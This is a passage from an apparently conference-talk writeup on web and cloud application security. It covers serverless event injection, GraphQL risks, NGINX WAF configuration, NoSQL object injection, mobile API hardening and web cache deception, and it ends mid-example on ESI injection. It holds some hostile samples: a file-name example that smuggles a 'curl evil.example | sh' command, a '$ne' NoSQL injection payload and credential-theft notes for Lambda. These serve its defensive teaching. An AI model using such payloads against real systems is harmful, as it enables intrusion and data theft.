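// Newer express-graphql releases export graphqlHTTP by name; older ones export it directly.
const { graphqlHTTP } = require('express-graphql');

const app = express();
const PORT = 3000;
// `schema` is assumed to be a GraphQLSchema built elsewhere.
app.use('/graphql', graphqlHTTP({
    schema: schema,
    graphiql: true,  // serves the GraphiQL IDE at this endpoint
}));
app.listen(PORT);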

GraphQL Overview
GraphQL Architecture

GraphQL Terminology

  • Schemas and Types: You can define object types (e.g. User) with fields (first_name, age) and their types (String, integer).
  • Queries => Select Statements
  • Mutations => Insert/Update Statements
  • Scalar => Custom Data Types
  • Resolver => Function that translates the type system to DB queries
Attacker's View of Serverless and GraphQL: Overview Diagram

FaaS Security Considerations

No Frameworks
Functions generally don’t use standard, battle-tested web frameworks like Django or Rails. Instead, devs are writing endpoints that don’t have all of the useful built-in security features, so they have to roll their own input validation code, implement access controls and logging per function, and overall have to ensure they protect against standard OWASP-style web app attacks like XSS, CSRF, SQL injection, etc.

No Network Attack Surface 👍

Observability/Debugging is a challenge
Monitoring functions for attacks and security-related logging is challenging unless you specifically architected for them.

Events from Multiple Sources
Functions can be triggered from events like S3, SNS, SQS, etc., which presents a larger attack surface than just web requests. Traditional security controls such as WAFs and others may be ineffective, as functions may be triggered by events instead of just HTTP requests. DAST tools tend to have trouble scanning functions, as they’re short-lived and generally can’t be crawled like standard web apps.

Attacker’s View of FaaS

Routes to FaaS Pwnage!

Abhay outlines three primary FaaS attack vectors, only the first of which is unique to FaaS:

  1. Attacking functions (and cloud provider) through non-API Gateway Events
    • As mentioned previously, initiating events, such as an S3 upload, that trigger a function enable you to attack functions out of band.
  2. Attacking functions (and cloud provider) through its API - standard web service attacks
  3. Denial of Service

Function Data Event Injection

Abhay defines event injection as an injection attack that’s triggered through third-party event notifications, for example, a file being uploaded to S3, a message sent over a notification service, a message received on a queue, DynamoDB stream events, etc.

The data in these events can cause standard injection bugs, such as insecure deserialization, XXE, (No)SQL injection, SSRF, and template injection.
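
As a rough illustration of why event data must be treated as untrusted, here is a minimal Python sketch of a function triggered by S3 uploads. It is not from Abhay's demos: the handler, the allow-list policy, and the sample keys are assumptions made for this example. The point is that the object key is chosen by whoever uploads the file, so it should be validated before it reaches a shell command, query, or template.

```python
import re
from urllib.parse import unquote_plus

# Assumed policy for this sketch: uploads are images with simple path-like names.
SAFE_KEY = re.compile(r"[A-Za-z0-9_\-./]+\.(?:png|jpg)")


def extract_object_keys(event):
    """Pull object keys out of an S3 notification event (keys arrive URL-encoded)."""
    return [
        unquote_plus(record["s3"]["object"]["key"])
        for record in event.get("Records", [])
    ]


def handler(event, context=None):
    """Hypothetical function entry point: sort keys into accepted and rejected."""
    accepted, rejected = [], []
    for key in extract_object_keys(event):
        # The key is attacker-controlled: never interpolate it into a shell
        # command, SQL query, or template without validating it first.
        if SAFE_KEY.fullmatch(key) and ".." not in key:
            accepted.append(key)
        else:
            rejected.append(key)
    return {"accepted": accepted, "rejected": rejected}
```

An upload named `a.png; curl evil.example | sh` would land in `rejected` here, whereas a function that passed the key straight to a shell-based image tool would run the attacker's command.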

Attacker's View of Serverless and GraphQL: Function Data Injection
An example function data event injection attack
Challenges

Function data event injection vulnerabilities are hard to test for, as execution is largely out-of-band.

Further, as mentioned previously, functions have a wide variety of execution scenarios and are thus hard to protect with WAFs or other network security controls, as events may be triggered by multiple types of non-HTTP protocols.

Privilege Escalation - IAM and Other Misconfigurations

Permissions are a common source of security issues in FaaS, as functions tend to be given overly permissive capabilities for the resources they interact with. Issues range from public S3 buckets, to access to all DynamoDB tables, to unneeded permissions that allow an attacker who finds a bug in the function to escalate their privileges.

Note: AWS credentials are often stored in the function’s environment variables, so if a vulnerability allows you to examine the target function’s environment you can extract them and start pivoting as that function’s AWS role.
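
A small Python sketch of what that looks like in practice. The helper names are made up for this example; the three variable names are the ones the AWS Lambda runtime sets for the function role's temporary credentials. Any bug that lets an attacker dump the environment exposes them, so the second helper shows one way to avoid leaking them through debug output.

```python
import os

# Environment variables the AWS Lambda runtime sets for the function role's
# temporary credentials.
CREDENTIAL_VARS = ("AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "AWS_SESSION_TOKEN")


def exposed_credentials(environ=None):
    """Return the credential variables present in the given environment."""
    env = os.environ if environ is None else environ
    return {name: env[name] for name in CREDENTIAL_VARS if name in env}


def redact(environ):
    """Copy an environment mapping with credential values masked, e.g. for logs."""
    return {
        key: ("<redacted>" if key in CREDENTIAL_VARS else value)
        for key, value in environ.items()
    }
```

Redaction only limits accidental disclosure; the more important control is keeping the function's role scoped to the minimum permissions it needs.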

Other Weaknesses

Authorization weaknesses, especially with JSON Web Tokens (JWTs), can be common, as can DoS attacks that exploit weaknesses in third-party library code.

Attacker’s view of GraphQL

GraphQL is subject to the same standard OWASP-style web vulnerabilities you’d see in any web app or API. However, a core challenge is that as the GraphQL ecosystem is still young, there’s little framework support for common functionality, meaning devs have to take a lot of the responsibility that standard web frameworks like Django handle for you.

Thus, it’s important to keep the following core areas in mind: access controls, input validation, query whitelisting, and rate limiting.

Abhay believes the most prominent and important vulnerability classes for GraphQL are authorization and info disclosure flaws, potentially NoSQL injection, and denial-of-service.

GraphQL Introspection (Information Disclosure)

GraphQL lets you introspect the server’s API, showing all actions, types (aka DB tables), and fields (aka columns) that are accessible.

This makes it easier for an attacker to leak sensitive info (they can easily see what’s available) and to find potential mass assignment-style bugs, as the attacker can learn all of the attributes for each type.
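
To show how little effort this takes, here is a minimal Python sketch. The query uses GraphQL's standard `__schema` introspection field; the helper functions and the sample response in the usage note are hypothetical, and no network request is made.

```python
import json

# Standard introspection query: list every type and the names of its fields.
INTROSPECTION_QUERY = """
query {
  __schema {
    types {
      name
      fields { name }
    }
  }
}
"""


def build_request_body(query):
    """GraphQL-over-HTTP servers typically accept a JSON body with a `query` key."""
    return json.dumps({"query": query})


def summarize_schema(response):
    """Map each type name to its field names, skipping built-in `__` types."""
    types = response["data"]["__schema"]["types"]
    return {
        t["name"]: [f["name"] for f in (t.get("fields") or [])]
        for t in types
        if not t["name"].startswith("__")
    }
```

Given a response that contains a `User` type with `id` and `password_hash` fields, `summarize_schema` would return `{"User": ["id", "password_hash"], ...}`, which is exactly the kind of map an attacker wants before probing for over-exposed attributes.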

GraphiQL
GraphiQL is an IDE with autocomplete and introspection capabilities for GraphQL APIs. Think Postman for GraphQL.

Injection with GraphQL

Unlike REST APIs, where there’s generally a single query per function, GraphQL resolvers are written for a larger query space. With NoSQL databases, this could lead to injection (and potentially RCE) if dynamic scripting is enabled, in backends like MongoDB, Elasticsearch, etc.

Denial of Service (DoS)

Nested queries can lead to server-side resource exhaustion or high cloud provider bills, especially with many-to-many fields.

For example, an Employee may have a reference to their Team, and Team may have a reference to all of the Employees on that team. An attacker can craft a malicious query that finds an employee, then that employee’s team, then all of the employees on the team, then…
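
One common mitigation is to reject queries that nest too deeply before executing them. The Python sketch below is a deliberately simplified illustration, not a production parser: it estimates depth by counting braces, skips ordinary quoted strings, and ignores fragments and block strings. The function names and the default limit of 4 are assumptions for this example.

```python
def query_depth(query):
    """Return the maximum nesting depth of selection sets, by counting braces."""
    depth = 0
    max_depth = 0
    in_string = False
    previous = ""
    for ch in query:
        if ch == '"' and previous != "\\":
            in_string = not in_string      # ignore braces inside string arguments
        elif not in_string:
            if ch == "{":
                depth += 1
                max_depth = max(max_depth, depth)
            elif ch == "}":
                depth -= 1
        previous = ch
    return max_depth


def is_allowed(query, max_depth=4):
    """Reject queries nested deeper than the configured limit."""
    return query_depth(query) <= max_depth


# The Employee -> Team -> Employees -> ... cycle from the text.
nested = "{ employee(id: 1) { team { employees { team { employees { name } } } } } }"
simple = "{ employee(id: 1) { name } }"
print(query_depth(nested), is_allowed(nested))
print(query_depth(simple), is_allowed(simple))
```

A real deployment would more likely do this on the parsed query, and combine it with the query whitelisting and rate limiting mentioned earlier.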

Resources

Building Cloud-Native Security for Apps and APIs with NGINX

Stepan Ilyin, Co-founder, Wallarm
abstract slides video

How NGINX modules and other tools can be combined to give you a nice dashboard of live malicious traffic, automatic alerts, blocking of attacks and likely bots, and more.

NGINX is a good place to implement protections for several reasons: traffic in many environments is already passed through NGINX reverse-proxies, the Kubernetes Ingress Controller is based on NGINX, and it can be easily deployed as a side-car for a microservice.

Chapter 1. APIs and microservices security with NGINX

WAF for APIs/Microservices in Kubernetes

In NGINX, you can enable ModSecurity with:

location / {
  ModSecurityEnabled on;
  ModSecurityConfig modsecurity.conf;
  proxy_pass http://localhost:8011;
  proxy_read_timeout 180s; 
}

For the ingress controller, enable the flag in the configmap:

apiVersion: v1
kind: ConfigMap
metadata:  
  name: nginx-configuration-external
  namespace: ingress-nginx
data:  
  enable-modsecurity: "true"  
  enable-owasp-modsecurity-crs: "true"

Enabling ModSecurity in Kubernetes:

metadata:  
  annotations:    
    nginx.ingress.kubernetes.io/configuration-snippet: |
      modsecurity_rules '
        SecRuleEngine On
        SecAuditLog /var/log/modsec/audit.log 
        SecAuditLogParts ABCIJDEFHZ
        SecAuditEngine RelevantOnly
      ';

Building a security dashboard to gain visibility of malicious traffic

By enabling ModSecurity we’re now blocking some malicious requests, but it’d be nice to have some insight into what malicious traffic we’re seeing. Here’s how to build a dashboard with open source tools.

Building a dashboard with NGINX, Fluentd and Elasticsearch
Logs are stored in /var/log/modsec/audit.log, which are then parsed by fluentd and sent to Elasticsearch. Logs are visualized in Kibana and automatic alerts are set up using ElastAlert.

Fluentd can be run as a sidecar in the ingress-nginx pod, and sharing a volume mount between ingress-nginx and Fluentd allows Fluentd to access the ModSecurity logs.

Visualizing Traffic Data with Kibana
Awww yeah, graphs!

Dashboards are nice, but you don’t want to have to always be watching them. Instead, we’d like automatic alerts to ensure we don’t miss anything.

Yelp open sourced ElastAlert, a simple framework for alerting on anomalies, spikes, or other interesting patterns of data in Elasticsearch.

Example alerts
  • Match where there are at least X events in Y time (frequency type)
  • Match when the rate of events increases or decreases (spike type)
  • Match when a certain field matches a blacklist/whitelist (blacklist and whitelist type)
  • Match on any event matching a given filter (any type)
  • Match when a field has two different values within some time (change type)
  • Match when a never before seen term appears in a field (new_term type)

Alerts can be sent to a number of external systems, such as e-mail, Jira, OpsGenie / VictorOps / PagerDuty, chat apps (HipChat / Slack / Telegram / Gitter), and Twilio.

Mirroring traffic for async analysis with 3rd party tools

When you’re integrating a new service into your production traffic flow, it’s crucial to make sure you don’t break things. This is often a concern with tools like WAFs, whose false positives may block legitimate user traffic.

NGINX has a mirror mode in which it sends every request to an additional backend (e.g. a WAF), which enables you to determine the effects of the new tool you’re considering while ensuring that nothing breaks.

location / {
  mirror /mirror;
  proxy_pass http://backend;
}  

location /mirror {
  internal;
  proxy_pass http://mirror_backend$request_uri;  
}

WAFs for NGINX

ModSecurity

ModSecurity is an open source WAF that can be efficient in detecting and blocking common web app security attacks (e.g. OWASP Top 10). It supports virtual patching and is quite customizable.

Challenges:

  • Default rulesets tend to result in a huge number of false positives.
  • As with any signature-based tool, it requires tuning, which can be challenging.
  • Signatures can’t block every attack, a creative attacker can bypass them.

Best practice:

  • Monitoring mode: Use the public ruleset
  • Blocking mode: craft rules from scratch specifically for your apps and API

To learn more, see the ModSecurity Handbook. Christian Folini has a nice blog post on how to tune your WAF installation to reduce false positives.

Naxsi

Naxsi doesn’t rely on complex signatures but instead looks for “dangerous” characters and expressions. It uses a small set of simple scoring rules containing 99% of known patterns involved in web vulnerabilities. For example, <, |, and drop are generally not supposed to be part of a URI.

Each time any of the characters or expressions in an incoming HTTP request match one of the rules, Naxsi increases the “score” of the request (SQLi, XSS, …). If a request’s score is above a threshold, the request is blocked.
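
The scoring idea can be sketched in a few lines of Python. To be clear, this is only an illustration of the approach described above: the rules, point values, categories, and threshold are invented for the example and are not Naxsi's actual rule set or configuration syntax.

```python
# Illustrative rules only: (pattern, category, points). Not Naxsi's real rules.
RULES = [
    ("<", "XSS", 8),
    (">", "XSS", 8),
    ("'", "SQL", 4),
    ("--", "SQL", 4),
    ("drop", "SQL", 4),
    ("|", "SQL", 4),
]

THRESHOLD = 8  # assumed per-category threshold for this sketch


def score_request(uri):
    """Add up points per category for every rule pattern found in the URI."""
    scores = {}
    lowered = uri.lower()
    for pattern, category, points in RULES:
        hits = lowered.count(pattern)
        if hits:
            scores[category] = scores.get(category, 0) + hits * points
    return scores


def is_blocked(uri, threshold=THRESHOLD):
    """Block when any category's score is above the threshold."""
    return any(score > threshold for score in score_request(uri).values())
```

With these made-up rules, `/search?q=shoes` scores nothing, while `/item?id=1' drop table users--` accumulates SQL points from the quote, the keyword, and the comment marker and is blocked.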

Sometimes these patterns may match legitimate queries, so you need to configure whitelists to avoid false positives.

  • Pros: Naxsi is resistant to many WAF-bypass techniques
  • Cons: You need to use LearningMode with every significant code deployment.

Repsheet (behaviour based security)

Repsheet is a reputation engine designed to help manage threats against web apps. It uses a behavior-based approach to detect malicious and fraudulent activity, using different resources to score incoming requests: HTTP header info, GeoIP, ModSecurity alerts, external feeds, and any custom rules you’ve set up.

Protecting against Bots and DDoS

Testcookie-nginx acts as a filter between the backend and bots performing L7 DDoS attacks, helping you to filter out junk requests. This works because HTTP-flooding bots are often dumb and lack browser features such as HTTP cookies and redirect support.

Testcookie-nginx works by doing a series of checks to determine if the requesting client supports cookies, JavaScript, and Flash, and if it can perform HTTP redirects.

  • Pro: Blocks many (dumb) bots and prevents automatic scraping
  • Con: Cuts out the Google bot and does not protect against sophisticated bots, for example, those that use a full browser stack.

Analyze web server logs for anomalies

You can use AI to detect bots using a neural network (e.g. PyBrain), and determine which requests during a DDoS are legitimate. A Dropbox engineer wrote a PoC of this approach here. The access.log file before the DDoS attack is useful for NN/ML training because it should list mostly your legitimate clients.

Block traffic from data centers, cloud / hosting providers and Tor

You could use GeoIP to ban all traffic from a country or area using ngx_http_geoip_module (https://nginx.org/en/docs/http/ngx_http_geoip_module.html). This tends to be a bad practice, as GeoIP data may not be accurate.

You could block the IP ranges of popular cloud providers, as requests from their ranges may be more likely to be bots. Each platform lists their IP ranges: GCP, AWS, Azure.
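
Checking a client address against such ranges is straightforward with Python's standard `ipaddress` module. In this sketch the ranges are placeholders taken from the blocks reserved for documentation (RFC 5737), not real provider ranges; in practice you would load the lists the providers publish.

```python
import ipaddress

# Placeholder CIDR blocks reserved for documentation (RFC 5737); a real
# deployment would load the cloud providers' published ranges instead.
CLOUD_RANGES = [
    ipaddress.ip_network(cidr)
    for cidr in ("192.0.2.0/24", "198.51.100.0/24")
]


def is_cloud_ip(address):
    """Return True if the address falls inside any of the listed ranges."""
    ip = ipaddress.ip_address(address)
    return any(ip in network for network in CLOUD_RANGES)
```

The same lookup could feed a generated NGINX deny list rather than running per request in application code.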

You could also block Tor exit nodes, proxies / anonymizers / etc. using a commercial feed like MaxMind, or specific malicious IPs using services like Project HoneyPot.

Disable resource-intensive application endpoints

L7 DDoS attacks often look for resource-intensive endpoints, such as /search, that can be queried in a way to make the server do a lot of computation and/or use up memory.

NGINX supports a custom HTTP code 444 that allows you to close the connection and return nothing in the response.

location /search {
  return 444;
}

Limit buffer, timeouts, connections in NGINX

If you’re under a DDoS, there are several NGINX directives you can tweak:

  • Limiting buffers: client_header_buffer_size, large_client_header_buffers, client_body_buffer_size, client_max_body_size
  • Timeouts: reset_timedout_connection, client_header_timeout, client_body_timeout, keepalive_timeout, send_timeout

Inducing Amnesia in Browsers: the Clear Site Data Header

Caleb Queern, Cyber Security Services Director, KPMG
abstract slides video

The new Clear-Site-Data HTTP header allows a website to tell a user’s browser to clear various browsing data (cookies, storage, cache, executionContexts) associated with the website.

This gives websites more fine-grained control over the data their users store in the browser. This can be used to ensure that certain sensitive info is not persistently stored, to wipe traces of having visited the site (for example, users living under a regime visiting an “unapproved” site), or for a site affected by a persistent XSS vulnerability to reset users to a “clean” state.
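To make the header format concrete, here is a small Python sketch that builds a Clear-Site-Data header value from the data types mentioned above. Each directive is sent as a quoted string, separated by commas. The helper name `clear_site_data_value` is made up for illustration, and how you attach the header to a response depends on your web framework.

```python
# Data types named in the talk summary above.
ALLOWED_TYPES = ("cache", "cookies", "storage", "executionContexts")


def clear_site_data_value(*types: str) -> str:
    """Build the value for a Clear-Site-Data response header."""
    if not types:
        raise ValueError("at least one data type is required")
    for data_type in types:
        if data_type not in ALLOWED_TYPES:
            raise ValueError(f"unknown data type: {data_type!r}")
    # Each directive is a quoted string; directives are comma-separated.
    return ", ".join(f'"{data_type}"' for data_type in types)
```

A logout endpoint might, for example, send `Clear-Site-Data: "cookies", "storage"` so that session state does not linger in the browser.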

From an offensive point of view, the Clear-Site-Data header could be used to:

  1. Wipe traces of a user having visited a malicious site (e.g. drive-by-download malware), making incident response more difficult.
  2. Flush cookies in competing subdomains, making session fixation attacks easier.
    • e.g. An attacker who controls foo.example.com sends a Clear-Site-Data header that erases cookies (or cache, localStorage, …) for example.com, which also affects bar.example.com.

Security is ultimately about reducing risk, sustainably, at the right cost.

Node.js and NPM Ecosystem: What are the Security Stakes?

Vladimir de Turckheim, Software Engineer, Sqreen
abstract slides video

Talk structure: some history and background about NodeJS, overview of several vulnerability classes, attacks on the NPM ecosystem, and best practice security recommendations.

For vulnerabilities, a SQL injection example is given as well as regular expression denial of service, the latter of which can be found by vuln-regex-detector.

The most interesting, JavaScript-specific vulnerability described was object injection, which occurs when an application expects data of a certain type to be provided (e.g. a number or string), but instead a different type (e.g. a JavaScript object) is provided, significantly changing the behavior of the code.

app.post('/documents/find', (req, res) => {
 const query = { };
 if (req.body.title) query.title = req.body.title;
 if (req.body.desiredType) query.type = req.body.desiredType;
 Document.find(query).exec()
  .then((r) => res.json(r));
});

In this code, an endpoint is querying a NoSQL database, expecting req.body to have a value like { desiredType: 'blog'}, which would result in the query: { type: "blog" }.

However, if an attacker provided an input like { desiredType: { $ne: 0 } }, the resulting query would be { type: { $ne: 0 } }. Since the type field in the database is a string, all records’ type fields will not be equal to 0 ($ne: 0), so all records will be returned, like a NoSQL version of or 1=1.
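The underlying fix is to check the type of each value before it reaches the query. Here is a language-neutral sketch of that idea in Python (the talk's example is Node.js; `build_query` is a hypothetical helper, and a real Node app would more likely use a schema validation library):

```python
def build_query(body: dict) -> dict:
    """Build a database query, accepting only plain string values."""
    query = {}
    # Map request field names to the query field names used in the example.
    for request_field, query_field in (("title", "title"), ("desiredType", "type")):
        value = body.get(request_field)
        if value is None:
            continue
        if not isinstance(value, str):
            # Rejects operator objects such as {"$ne": 0}.
            raise TypeError(f"{request_field} must be a string")
        query[query_field] = value
    return query
```

With this check, `{"desiredType": "blog"}` still produces `{"type": "blog"}`, but `{"desiredType": {"$ne": 0}}` is rejected instead of being passed to the database.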

Ecosystem attacks: most NPM libraries have a huge number of direct and indirect dependencies, which exposes a large supply chain attack surface. Vladimir discusses when ESLint was backdoored as an example.

Recommendations:

  • Keep NodeJS up to date
  • Review any use of critical core modules - carefully sanitize any user input that reaches fs, child_process, and vm
  • Data validation is not native in JavaScript, so validate and sanitize inputs using a library like joi
  • Monitor your dependencies for known issues
  • Monitor your dependency tree (anvaka) - some libraries that perform the same functionality have significantly fewer dependencies than others. Minimize your attack surface.

Preventing Mobile App and API Abuse

Skip Hovsmith, Principal Engineer, CriticalBlue
abstract slides video

An overview of the mobile and API security cat and mouse game (securely storing secrets, TLS, cert pinning, bypassing protections via decompiling apps and hooking key functionality, OAuth2, etc.), described through an example back and forth between a package delivery service company and an attacker-run website trying to exploit it.

Skip walks through several mobile and API security best practices via an example company ShipFast, a package delivery service company with a mobile app and API, and ShipRaider, an attacker-run website that aims to exploit security issues in ShipFast for their benefit.

This talk does a nice job of showing how security is a cat and mouse game between attackers and defenders, especially in mobile apps, where the defender’s code is being run on devices the attacker controls.

Client Side Security Doesn’t Exist
The tl;dr of this talk, which will be unsurprising to anyone who’s been in security more than a few months, is that client side security is for the most part impossible. If an attacker has complete control over the environment in which your code is running (e.g. mobile app running on the attacker’s device, JavaScript running in the attacker’s browser, etc.), you can try to slow them down, but they can dismantle your protections eventually, given enough time, effort, and skill.

But, it’s still instructive to see the various defenses that can be used and how they can be bypassed, so let’s get into it.

App Identity Using API Keys

First, ShipFast might include an API key in the app so that the backend can verify that the request is coming from the app they expect.

But, this API key might get leaked to GitHub accidentally, or the attacker can decompile the app and simply extract it.

The defender can try to mitigate abuse if the API key is leaked by attempting to detect API probing, app layer DDoS attacks, data scraping, credential stuffing, and by setting quotas, spike arrests, and concurrency limits (which may vary by how expensive the call is, and can be fixed or load adaptive). Stripe has a nice blog post about the leaky bucket rate limiting pattern: Scaling your API with rate limiters.
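As a rough sketch of what a quota with bursts can look like, here is a minimal token bucket in Python, a close relative of the leaky bucket pattern mentioned above. The class name, parameters, and per-call `cost` are assumptions for illustration, not code from the talk or from Stripe's post.

```python
import time


class TokenBucket:
    """Allow bursts up to `capacity`, refilled at `refill_per_sec` tokens/second."""

    def __init__(self, capacity: float, refill_per_sec: float, now=time.monotonic):
        self.capacity = capacity
        self.refill_per_sec = refill_per_sec
        self._now = now  # injectable clock, which makes the bucket easy to test
        self._tokens = capacity
        self._last = now()

    def allow(self, cost: float = 1.0) -> bool:
        """Return True and spend `cost` tokens if the request fits the budget."""
        current = self._now()
        elapsed = current - self._last
        self._last = current
        # Refill for the elapsed time, never exceeding capacity.
        self._tokens = min(self.capacity, self._tokens + elapsed * self.refill_per_sec)
        if self._tokens >= cost:
            self._tokens -= cost
            return True
        return False
```

Expensive endpoints can pass a higher `cost`, which is one simple way to make limits vary by how expensive the call is.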

The defender can also do some behavioral analysis of API requests to detect abuse based on sequences of calls that should be impossible in practice, for example, a driver checking in all over the city faster than it would be possible to get there.
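One way to picture the "impossible check-in" heuristic is a speed check between consecutive check-ins. This Python sketch uses the haversine formula for distance; the `(lat, lon, unix_seconds)` tuple layout and the 120 km/h threshold are assumptions chosen for the example.

```python
import math

EARTH_RADIUS_KM = 6371.0


def haversine_km(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    """Great-circle distance in kilometers between two lat/lon points."""
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    dphi = phi2 - phi1
    dlambda = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(phi1) * math.cos(phi2) * math.sin(dlambda / 2) ** 2
    return 2 * EARTH_RADIUS_KM * math.asin(math.sqrt(a))


def is_impossible_trip(prev, curr, max_kmh: float = 120.0) -> bool:
    """prev and curr are (lat, lon, unix_seconds) check-ins, in time order."""
    distance = haversine_km(prev[0], prev[1], curr[0], curr[1])
    hours = (curr[2] - prev[2]) / 3600.0
    if hours <= 0:
        # Same (or earlier) timestamp: any movement at all is suspicious.
        return distance > 0
    return distance / hours > max_kmh
```

A driver checking in at the Santa Monica pier and then in downtown LA one minute later would be flagged, while the same two check-ins an hour apart would not.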

Secure Communication: Protect secrets in transit

ShipFast may try to protect secrets in transit using TLS, but ShipRaider can install their own certificate on the device so they can man-in-the-middle the traffic.

ShipFast may then try to prevent this by using certificate pinning, where the client keeps a whitelist of trusted certificates and only connects to servers presenting one of them. But ShipRaider can simply hook the pinning checks using tools like SSL-TrustKiller and Frida, making them always return true, as if all is well.

Certificate pinning does impose some upkeep costs when used, as certs must be managed, the private keys stored securely, and the certs may expire or be revoked.

Remove Secret from the Channel

ShipFast may then try to not send a secret off the device at all, but instead use the client secret to compute some HMAC signature that it sends instead which the server can verify.
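A minimal sketch of this signing scheme in Python, using the standard library's `hmac` module. The message layout (method, path, and body joined by newlines) is an assumption for illustration; real APIs usually also sign a timestamp or nonce to limit replay.

```python
import hashlib
import hmac


def sign_request(secret: bytes, method: str, path: str, body: bytes) -> str:
    """Compute a hex HMAC-SHA256 signature over the request."""
    message = method.encode() + b"\n" + path.encode() + b"\n" + body
    return hmac.new(secret, message, hashlib.sha256).hexdigest()


def verify_request(secret: bytes, method: str, path: str, body: bytes, signature: str) -> bool:
    """Server side: recompute the signature and compare in constant time."""
    expected = sign_request(secret, method, path, body)
    return hmac.compare_digest(expected, signature)
```

The secret itself never crosses the wire, only the signature does, but the client still has to hold the secret somewhere.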

However, again, the attacker can simply decompile the app (using tools like dex2jar and apktool for Android apps) and find the secret.

ShipFast may then instead try to calculate the secret at runtime so there’s not a static value that can be extracted. However, ShipRaider can simply do runtime hooking and/or repackage the app to better support debugging to read the secret after it’s been calculated.

App Hardening Approaches

There are several app hardening steps that can be taken that raise the effort required by the attacker, but are still fundamentally bypassable given enough time.

Custom Secret Computation: Split a static secret into pieces, functionally recompute secret at runtime.

Obfuscation and Anti-Tamper: Obfuscate app code and make it tamper resistant, making code comprehension harder. (still vulnerable to hooking type attacks)

White-Box Cryptography: Represent a secret by its obfuscated operations - hide a function, a piece of functionality you drop in the app, instead of a secret value (can still be hooked)

Software and Hardware Backed KeyStores: These allow performing operations without exposing keys and have nice security properties, but using hardware backed keystores correctly can be challenging.
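To illustrate the "Custom Secret Computation" idea from the list above, here is a toy Python sketch that splits a secret into two XOR shares and recombines them at runtime. This is only a sketch of the concept (the function names are made up), and as noted, an attacker who hooks the app after recombination still sees the secret.

```python
import secrets


def split_secret(secret: bytes):
    """Split a secret into two shares; neither share alone reveals it."""
    mask = secrets.token_bytes(len(secret))
    masked = bytes(a ^ b for a, b in zip(secret, mask))
    return mask, masked


def recombine(mask: bytes, masked: bytes) -> bytes:
    """Recompute the secret at runtime by XORing the two shares."""
    return bytes(a ^ b for a, b in zip(mask, masked))
```

The two shares could be stored in different parts of the app so that a simple string search of the binary no longer turns up the key.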

User Authentication: It’s really about App Authorization

Finally, Skip describes the OAuth2 protocol, discusses some of the common flows (OAuth2 code grant flow, refresh tokens, OAuth2 Proof Key for Code Exchange (PKCE)), and then shows a few patterns aimed at further reducing attack surface via how secrets are handled.
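For readers unfamiliar with PKCE, here is a short Python sketch of the client-side values defined in RFC 7636: a random code verifier and its S256 code challenge. The function names are hypothetical; only the encoding (unpadded base64url of a SHA-256 digest) comes from the RFC.

```python
import base64
import hashlib
import secrets


def make_code_verifier(n_bytes: int = 32) -> str:
    """Generate a random, URL-safe code verifier (43 chars for 32 bytes)."""
    raw = secrets.token_bytes(n_bytes)
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def code_challenge_s256(verifier: str) -> str:
    """Derive the S256 code challenge: BASE64URL(SHA256(verifier)), no padding."""
    digest = hashlib.sha256(verifier.encode("ascii")).digest()
    return base64.urlsafe_b64encode(digest).rstrip(b"=").decode("ascii")
```

The app sends the challenge with the authorization request and the verifier with the token request, so an intercepted authorization code alone is not enough to obtain tokens.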

Mobile Abuse: OAuth2 Flow
Note: OAuth2 is actually about authorization, not authentication.
Secrets as a Service, API Proxy Pattern, App Integrity Measurement, Strengthening OAuth2 Flow
Approaches to reducing your mobile attack surface

In the end, Skip recommends this final architecture pattern:

Mobile Abuse: Final Recommended Architecture

Resources

Cache Me If You Can: Messing with Web Caching

Louis Dion-Marcil, Information Security Analyst, Mandiant
abstract slides video

In this talk, Louis covers 3 web cache related attacks: cache deception, edge side includes, and cache poisoning.

Note: this was an awesomely dense, technical talk. I won’t cover all of the details here, I encourage you to check out the video and slides if you want the full details.

Cache Deception

Web cache deception abuses URL-based caching mechanisms by tricking a user’s browser into requesting a URL that causes their sensitive info to be cached. The attacker can then obtain the cached content.

Web cache deception was originally published in 2017 by Omer Gil and demonstrated against PayPal.

Impact: Depends on the context, but some examples include stealing security questions, CSRF tokens, or really any sensitive data (like on an admin panel).

Cache Me: Deception URLs
By appending /a.jpg to the URL we’re causing it to be cached
Cache Me: Stealing CSRF
An example 2-stage attack to 1) steal CSRF tokens and then 2) use it

Conditions: Web cache deception can occur when the application server does not include an ending match delimiter, such as the following Django example:

urlpatterns = [
  url(r'^profile/security-questions', views.questions, ...),
  # NOTE: there is no ending match delimiter, so any trailing
  # text will match (Django matches against the path without
  # its leading slash)
]

# This is the fix
urlpatterns = [
  url(r'^profile/security-questions$', views.questions, ...),
  # The $ matches end of the path string
]
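The effect of the missing `$` can be checked with plain `re`, applied here to a full request path rather than going through Django's resolver. The `route_matches` helper is a made-up name for this sketch.

```python
import re

UNANCHORED = re.compile(r"^/profile/security-questions")
ANCHORED = re.compile(r"^/profile/security-questions$")


def route_matches(pattern, path: str) -> bool:
    """Return True if the route pattern matches the request path."""
    return pattern.search(path) is not None
```

`route_matches(UNANCHORED, "/profile/security-questions/a.jpg")` is true, so the sensitive page is served under a URL that looks like a static image, while the anchored pattern rejects it.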

Mitigations:

  • Your app should not return “200 OK” to garbage requests.
  • The cache server should not ignore caching headers.
  • Cloudflare’s solution: the filetype must match the response Content-Type header.
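The last mitigation can be sketched as a check the cache runs before storing a response: only cache when the URL's file extension agrees with the Content-Type the origin returned. This is an illustration of the idea in Python, not Cloudflare's actual implementation, and `safe_to_cache` is a hypothetical name.

```python
import mimetypes
import posixpath


def safe_to_cache(path: str, content_type: str) -> bool:
    """Cache only if the URL's extension matches the response Content-Type."""
    expected, _ = mimetypes.guess_type(posixpath.basename(path))
    if expected is None:
        # Unknown or missing extension: do not treat as a static file.
        return False
    # Drop parameters such as "; charset=utf-8" before comparing.
    actual = content_type.split(";", 1)[0].strip().lower()
    return actual == expected
```

A request for `/profile/security-questions/a.jpg` that comes back as `text/html` fails the check, so the HTML page with the user's data is never cached.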

There’s a Burp extension by Trustwave, Web Cache Deception Scanner, that can test for these vulnerabilities.

Edge Side Include Injection (ESII)

Edge Side Includes (ESI) allow an application to control the cache: they can cache dynamic files, invalidate cache entries, and make decisions based on the user’s state.

Cache Me: ESI Server Include
The end user sees a single HTTP response, but the cache server may see multiple fragments, some static, some dynamic
<html>
  ...
  <i>Monday</i>
  <esi:include src="http://api.local/Montreal/Monday" />
  ...
</html>

When the cache server fetches a file for a user, it sees the XML tags in the response and parses them.

Cache Me: ESII Diagram

ESI variables expose metadata about the current HTTP transaction.

<!-- Access 'PHPSESSID' cookie -->
